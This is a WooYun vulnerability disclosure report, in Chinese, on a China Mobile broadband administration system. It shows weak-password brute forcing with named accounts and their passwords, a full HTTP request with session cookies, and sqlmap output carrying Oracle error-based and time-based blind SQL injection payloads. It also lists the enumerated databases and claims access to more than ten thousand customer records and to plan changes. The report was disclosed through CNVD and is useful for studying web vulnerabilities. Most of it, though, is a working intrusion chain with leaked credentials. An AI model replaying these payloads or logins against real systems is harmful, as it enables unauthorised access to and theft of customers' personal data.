乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-10: 细节已通知厂商并且等待厂商处理中 2016-01-14: 厂商已经确认,细节仅向厂商公开 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-02-03: 细节向普通白帽子公开 2016-02-13: 细节向实习白帽子公开
移动信息泄露
缺陷地址: **.**.**.**:8888/Admin/Account/Login?ReturnUrl=%2F
首先burp 姓名爆破liuyu/111111权限较小也有4000个用户
继续深入寻找高权限用户#2注入 应该有很多处 因为很多地方都可以查询
GET /Broadband/Report/PlansMoneyTotal?Search.District=1&Search.PlansMoney=1 HTTP/1.1Host: **.**.**.**:8888Proxy-Connection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: __RequestVerificationToken=2jASattMWL2Q1IdJrjqSkwM4eepECJpPGRft_tczDVzY7f0xZe7PfIhZOKHhMpcmyJx4w1wlVagLaKum9kqJrXP1FXK5LQiEFr1QK0G-CT9p2TML6UTJj-3YRNDsZiwPQZke5y2sK6cJjZsaPYtteg2; .ASPXAUTH=AFCFC8445BAE93599E590B9A9CE2799C464162CE7DF6E2C197A75C18B1B46B8CD719CF25E365388DB8359AE4351811CBA6D055CD764067408CB91C4D086ACCED0E4085A56974B28CD1B57FA2C683B897646E8CA83DEDBCAF15245146CE82B781F79B1E5AAAB1C20AEA86F860743464E7C95B02B1007DB2759AFD7BA385D541ED25D65E1AF5B465E2A57D9757CFF8BE11
sqlmap identified the following injection point(s) with a total of 140 HTTP(s) requests:---Parameter: Search.District (GET) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: Search.District=1' AND 7561=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7561=7561) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'bTUn' LIKE 'bTUn&Search.PlansMoney=1 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: Search.District=1' AND 2250=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(117)||CHR(109)||CHR(67),5) AND 'rKTP' LIKE 'rKTP&Search.PlansMoney=1---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Oraclesqlmap resumed the following injection point(s) from stored session:---Parameter: Search.District (GET) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: Search.District=1' AND 7561=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7561=7561) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'bTUn' LIKE 'bTUn&Search.PlansMoney=1 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: Search.District=1' AND 2250=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(117)||CHR(109)||CHR(67),5) AND 'rKTP' LIKE 'rKTP&Search.PlansMoney=1---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Oracleavailable databases [24]:[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] HR[*] IX[*] MDSYS[*] OE[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] PM[*] SCOTT[*] SH[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB[*] YAWL24个库
找到用户名和密码表后发现加密方式应该带key无法解密K = 1111117MurghRTdiM = 123456 能看到
拿一些数据测试
刘怀琪/111111 权限很高
一万多信息
变更业务套餐等
修复弱口令和后台大量注入
危害等级:高
漏洞Rank:10
确认时间:2016-01-14 16:22
CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.
暂无